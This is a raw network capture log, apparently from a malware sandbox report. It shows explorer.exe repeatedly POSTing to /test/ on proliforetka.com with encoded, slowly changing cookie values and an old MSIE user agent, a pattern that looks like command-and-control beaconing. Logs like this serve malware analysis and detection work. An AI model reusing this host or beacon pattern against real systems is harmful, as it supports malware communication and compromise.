                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-17 16:58:01 UTC | 807 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:58:01 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N4lygRS57b4PxfgR7uunqJzH8dtpKRbHf7XjugBDShkcbn1SMsmWQZRsqs82ol4I71nY4GvX5RWcdsKqJfFvS8HAdQY2g6BzoyeFc6Y%2BvSctF0jXF4MXKFNQH1ADzN2s4qrv"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f38749b0bc743ad-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=15697&min_rtt=2207&rtt_var=9018&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1059&delivery_rate=1323062&cwnd=203&unsent_bytes=0&cid=436b9d27ff5f9a82&ts=750&x=0"
                                                                                                                                2024-12-17 16:58:01 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                25 | 192.168.2.6 | 50019 | 172.67.161.60 | 443 | 4004 | C:\Windows\explorer.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-17 16:58:03 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX3JoJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-17 16:58:03 UTC | 808 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:58:03 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FUqHO%2B64CT12qBCtL3iQekllY9sT0YqY8lEk5s1FqByRFpyfDCkdb6FBfqGWdHq0B5gjR3X6JJjqQl7Ln1sr4Jh7GZUI6P97F2UH1Pn0nBnqDuv9OZBkumu6Doqod01Kf3nQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f3874ab885a718b-FRA
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=91061&min_rtt=91059&rtt_var=34152&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1059&delivery_rate=32059&cwnd=32&unsent_bytes=0&cid=677757c61612e330&ts=716&x=0"
                                                                                                                                2024-12-17 16:58:03 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                26 | 192.168.2.6 | 50020 | 172.67.161.60 | 443 | 4004 | C:\Windows\explorer.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-17 16:58:05 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX3J4J2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-17 16:58:06 UTC | 812 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:58:05 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s7APTBgOUX8JK%2BOeSxnZPOpzRluTqZXBqq1egEJ7cktwe6bEkb%2BkvefNUc9e3ruCzvwumtqgtz0xhRCwd9sx7QWysOb6h4KbXZ9r%2FSq35SGfhy8F8jR%2BnrOtDdBQuXNkuDrV"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f3874b98eb0b96f-AMS
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=78351&min_rtt=78330&rtt_var=29389&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1059&delivery_rate=37278&cwnd=32&unsent_bytes=0&cid=6da109c99a1fe511&ts=673&x=0"
                                                                                                                                2024-12-17 16:58:06 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                27 | 192.168.2.6 | 50021 | 172.67.161.60 | 443 | 4004 | C:\Windows\explorer.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-17 16:58:07 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX3IIJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
2024-12-17 16:58:08 UTC | 807 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:58:08 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bv0xK6vRf4VgOlLKjS9dGsrXZy1vqO5%2BKURfSWJc83Tfo2JzZtjWZXrAhmNlIGE9b12fPoNvXBxPTLLYe3D6qMz8ORf4hsGEXLsDEjJUoPFPK9CFwrDl758rqsXU0elBdD3m"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f3874c62a668c15-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2040&min_rtt=2035&rtt_var=774&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1059&delivery_rate=1403171&cwnd=238&unsent_bytes=0&cid=911cea1941581326&ts=873&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.6 | 50022 | 172.67.161.60 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:58:09 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX3IYJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
2024-12-17 16:58:10 UTC | 812 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:58:10 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HMNPl2sR3owfR9hjZiSGaNGXq%2BLogPQemyqZKLaAQi67Wk1dBbIVfV%2BOJ6b3jQQ0JSxH12KqFRUPVo%2FIQZ9MgCsvGE2%2B0z38JRlFH5IPgLOLhaAOOwRCI4nmqwfGccEwmaZ3"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f3874d4fdc5b909-AMS
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=77998&min_rtt=77979&rtt_var=29281&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1059&delivery_rate=37370&cwnd=32&unsent_bytes=0&cid=95ad4782b1c319b9&ts=672&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.6 | 50023 | 172.67.161.60 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:58:11 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX3IoJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
2024-12-17 16:58:12 UTC | 811 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:58:12 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cBfdIENq%2BXIulfEfCdlDhOC1gh%2BuJ6wnpMfdvaLEh203pt0pmFeumrup0CpU1IGTAoL8y2c%2F0zXj3H1CrM7HKlPI300ZbdD6Eef27Yci%2FSNYB1jLMRBBZDOxnHaoHjTutLYx"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f3874e0d9f442b7-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1624&min_rtt=1607&rtt_var=638&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1059&delivery_rate=1668571&cwnd=212&unsent_bytes=0&cid=85279fc8d67e1117&ts=761&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.6 | 50024 | 172.67.161.60 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:58:13 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX3I4J2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
2024-12-17 16:58:14 UTC | 814 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:58:14 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ptD%2Bnr3edjWxLQwlhsjO8AMOjuCDlK0zglxIlB3V28UoV6Cd8enf64LYA%2FrcAd%2FryPCN1oyWVRycwwUx2VafyaPRpk6NOfJlQZUmXEMqUr5KfhvmmU4zTEcGCIIG0ug%2B3CCu"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f3874edfedc42c6-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=20963&min_rtt=1666&rtt_var=12178&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1059&delivery_rate=1752701&cwnd=149&unsent_bytes=0&cid=446493a96a177ef1&ts=789&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.6 | 50025 | 172.67.161.60 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:58:16 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX3LIJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
2024-12-17 16:58:17 UTC | 821 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:58:17 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ekle5Gw5cn2I%2BxAK5EYLcis%2FWT%2FB6xx2IsOoQVWzYnBvkSrENljDJZFp27CQQrUZG9fXEbvATDQJAHjSB%2FXqAJBWj4mVc%2FT9ey4t9%2F3fiBxp%2BCy0%2Fu6oM7ZPCYolDXYCfqBk"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f3874ff2a32d141-CDG
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=81213&min_rtt=81213&rtt_var=30456&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1059&delivery_rate=35952&cwnd=32&unsent_bytes=0&cid=9d61e8e18f328b5a&ts=1187&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.6 | 50026 | 172.67.161.60 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:58:18 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX3LYJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
2024-12-17 16:58:19 UTC | 812 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:58:19 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EkHyiOA4Ey7%2FatLkcGbh2JL17gN8iiu7FFeJUa%2FQd958SXyqqi4eC6yuhYduXUkzEJqueURnW30LJ0KElwfON3QCrGyK6ED63keGT%2BNufFto6o%2BBecW1YMMq0WqG7xlMrvxc"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f38750cdfa5d145-CDG
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=81602&min_rtt=81272&rtt_var=30713&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1059&delivery_rate=35928&cwnd=32&unsent_bytes=0&cid=d9c3a72d82fb0054&ts=700&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.6 | 50027 | 172.67.161.60 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:58:21 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX2JIJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
2024-12-17 16:58:21 UTC | 818 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:58:21 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cJ%2Fu9ZIqjabnujeq30ifYVrEC%2Bhj9J8TgMWhvfgN4XTgF%2B9llI7UTh4ywogr7rTWdzjDLTBiTSAc13uyP%2FQF6a3CHx5zB4PLr%2FZTefbgc%2BBavKWRw0V779a7NE%2BpHIqyAj4C"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f38751d0f15d383-CDG
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=81252&min_rtt=81247&rtt_var=30478&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1059&delivery_rate=35920&cwnd=32&unsent_bytes=0&cid=444bcd34760bde48&ts=692&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.6 | 50029 | 172.67.161.60 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:58:23 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX2JYJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
2024-12-17 16:58:24 UTC | 817 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:58:23 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bDF6NDnMJ3i9tBv97Oc2InLG%2Bld0K870tsxK5G%2FDcfwUMSilNBG8S6XAaRuGTvJAN91NY%2BxTGPr%2F%2FZcJ9wUP4HrGWgaTU6qq8xt2zNO2UU60d%2FTh52ysPUL%2BmzqlKyR9PO8L"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f387529eff58cab-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2045&min_rtt=2041&rtt_var=774&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1059&delivery_rate=1407228&cwnd=240&unsent_bytes=0&cid=2ccf55ba1e122bf6&ts=765&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.6 | 50030 | 172.67.161.60 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:58:25 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX2JoJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
2024-12-17 16:58:26 UTC | 810 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:58:26 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g9m0ztJ2TacYSn%2BHbN5k5NYZ1cZUklmMIJX2Q8zN5AQ6Q4ditxkPn6hsOeae57WCFEeRRbyDHH%2FKGk9myD4ieOk9lv6VV5k5ORWSSsKpkQhH8Thx08gCyhBUoJZ%2F7jKE2HOp"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f3875384afed3b7-CDG
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=81104&min_rtt=81090&rtt_var=30436&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1059&delivery_rate=35959&cwnd=32&unsent_bytes=0&cid=60209e9ed4c50d44&ts=707&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.6 | 50031 | 172.67.161.60 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:58:27 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX2J4J2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
2024-12-17 16:58:28 UTC | 809 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:58:28 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FqirYa%2BwMUQbUw7Obak5AOnFY8MLmhMgvMX6OkFycvrU2trgrrrooQlKMZRIRbwy9asej6v3%2FBV1dykuF7RXCjhkPNljcteAsv95nJDDbdQk1guZVVae%2B0Q54XgVNxFoLw3j"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f387544aba84239-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1747&min_rtt=1715&rtt_var=707&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1059&delivery_rate=1479979&cwnd=229&unsent_bytes=0&cid=4d0f594861c51d77&ts=703&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.6 | 50032 | 172.67.161.60 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:58:29 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                Accept: */*
